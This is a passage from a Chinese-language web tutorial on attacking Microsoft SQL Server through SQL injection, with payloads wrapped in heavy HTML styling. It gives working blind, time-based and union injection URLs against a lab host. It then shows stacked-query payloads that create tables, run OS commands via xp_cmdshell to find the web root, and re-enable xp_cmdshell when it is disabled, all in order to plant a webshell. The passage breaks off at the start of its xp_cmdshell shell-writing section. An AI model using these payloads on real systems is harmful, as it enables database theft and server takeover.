inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">41</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)--</span></code></span></span></p></li>
   </ol>

如果你绕过了declare 那么waf基本没啥用了,这里如果你用hackbar的话记得把加号url编码。

第六章 MSSQL盲注与联合注入

0x00 盲注

布尔盲注

其实跟mysql大同小异 无非就是分割字符串比较,但是mssql的盲注套路确实没那么多

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)) >= 109</span></code></span></span></p></li>
   </ol>

时间盲注

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1;if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY '0:0:5'--</span></code></span></span></p></li>
   </ol>

当然盲注你也可以使用前面提到的declare 灵活运用吧,对于盲注这块感觉mssql不如mysql灵活

0x02 联合注入

mssql联合注入我们一般不使用 数字占位,而是null,因为你使用数字占位可能会发生隐式转换

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 union select 1,2,3</span></code></span></span></p></li>
   </ol>

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 union select null,name,pass from info</span></code></span></span></p></li>
   </ol>

当然也可以这样用

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 SELECT 1 UNION (select CAST(USER as int))</span></code></span></span></p></li>
   </ol>

在mssql中我们如果想查询多条数据可以使用%2B 也就是加号

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 union select null,name%2Bpass,null from info</span></code></span></span></p></li>
   </ol>

第七章 MSSQL备份拿shell

0x00 简介

备份拿shell也就涉及到了权限的问题,SA权限不用说没有降权的话基本能做任何事情了,它数据库权限是 db_owner,当然其他用户如果也拥有 db_owner 基本也可以通过备份拿下shell,但是在设置目录权限后就不行了。

0x01 路径的寻找

需要路径的我们一般有几个思路:

1.报错寻找

2.字典猜

3.旁站信息收集

4.调用储存过程来搜索

6.读配置文件

这里我们着重讨论一下储存过程也就是这些函数来找我们的网站根目录 一般我们可以用xpcmdshell xpdirtree

xp_dirtree xp_subdirs

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">execute master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">..</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_dirtree </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//列出所有c:\文件和目录,子目录 </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">execute master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">..</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_dirtree </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//只列c:\文件夹 </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">execute master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">..</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_dirtree </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//列c:\文件夹加文件 </span></code></span></span></p></li>
   </ol>

那么我们怎么利用呢,执行xp_dirtree返回我们传入的参数如果你想吧文件名一起返回来,因为没有回显所以可以这样创建一个临时的表插入

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1;insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1</span></code></span></span></p></li>
   </ol>

xp_cmdshell

这个xp_cmdshell 找起来更加方便我们调用cmd的命令去搜索,比如我的web目录有个1.aspx

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">C</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">\Users\Aleen</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">></span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">for</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">r c</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">\ </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">%</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">i </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">in</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">aspx</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">do</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@echo</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">%</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">i</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">c</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">\Users\Aleen\AppData\Local\Microsoft\Windows\Temporary </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Internet</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Files</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">\Content</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">IE5\8KB2ZI22\1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">].</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">aspx</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">c</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">\www\1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">aspx</span></code></span></span></p></li>
   </ol>

所以我只需要建立一个表 存在一个char字段就可以了

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1;CREATE TABLE cmdtmp (dir varchar(8000));</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c:\ %i in (1*.aspx) do @echo %i'</span></code></span></span></p></li>
   </ol>

当然你可能遇到xp_cmdshell不能调用 如果报错

SQL Server 阻止了对组件 ‘xpcmdshell’ 的 过程’sys.xpcmdshell’ 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用。

可以用如下命令恢复

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_configure </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'show advanced options'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//允许修改高级参数</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">RECONFIGURE</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_configure </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'xp_cmdshell'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//打开xp_cmdshell扩展</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">RECONFIGURE</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;--</span></code></span></span></p></li>
   </ol>

当然还不行可能xplog70.dll需要恢复,看具体情况来解决吧 ,这些问题百度一堆一堆的。

其他的可以利用的储存过程还有spoamethod什么的不是本文讨论的重点了,因为2008的xpcmdshell 权限不是2005那样的system 所以不考虑加账号

xp_regread

通过读注册表 这个在win2000才有用 就不多说了

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dbo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_regread </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'HKEY_LOCAL_MACHINE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'/'</span></code></span></span></p></li>
   </ol>

0x02 xp_cmdshell拿shell

虽然是备份拿shell顺便提下,我们找到目录了权限能调用xp_cmdshell来写那样就很轻松了也就不需要备份了。

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
